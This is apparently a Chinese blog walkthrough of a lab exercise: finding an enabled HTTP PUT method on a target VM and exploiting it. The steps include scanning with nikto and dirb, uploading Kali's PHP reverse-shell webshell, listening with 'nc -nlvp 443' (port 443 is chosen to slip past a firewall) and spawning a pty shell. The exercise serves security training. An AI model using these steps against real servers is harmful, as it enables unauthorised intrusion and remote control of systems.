前言
作者简介:不知名白帽,网络安全学习者。
博客主页:https://blog.csdn.net/m0_63127854?type=blog
CTF-专栏:https://blog.csdn.net/m0_63127854/category_11835386.html
目录
中间件包括apache、tomcat、IIS、weblogic等这些中间件可以设置支持的HTTP方法(HTTP方法包括GET、POST、HEAD、DELETE、PUT、OPTIONS等)
每一个HTTP方法都有其对应的功能,在这些方法中,PUT可以直接从客户机上传文件到服务器。如果间接开放了HTTP中的PUT方法,那么恶意攻击者就可以直接上传webshell到服务器对应的目录。
直接上传shell,也可以从侧面反应PUT漏洞的严重危害性。
kali 192.168.20.128
靶机 192.168.20.137
链接:https://pan.baidu.com/s/1UUoIKTbq5UbyAgteYVIjNg
提取码:i59h


nikto -host http://192.168.20.137


发现dirb扫描出两条连接
打开查看第一条


第一条链接没有有效信息
打开查看第二条

是一个空目录,没有有效信息
owasp-zap扫描漏洞



没有扫描到高危漏洞
curl -v -X OPTIONS http://192.168.20.137/test

该目录存在PUT漏洞
cp /usr/share/webshells/php/php-reverse-shell.php /root/Desktop/shell.php

端口使用443是为了绕过防火墙
下载插件RESTClient

发现rshell.php被成功上传

nc -nlvp 443

执行rshell.php


发现不是root用户
echo "import pty;pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py
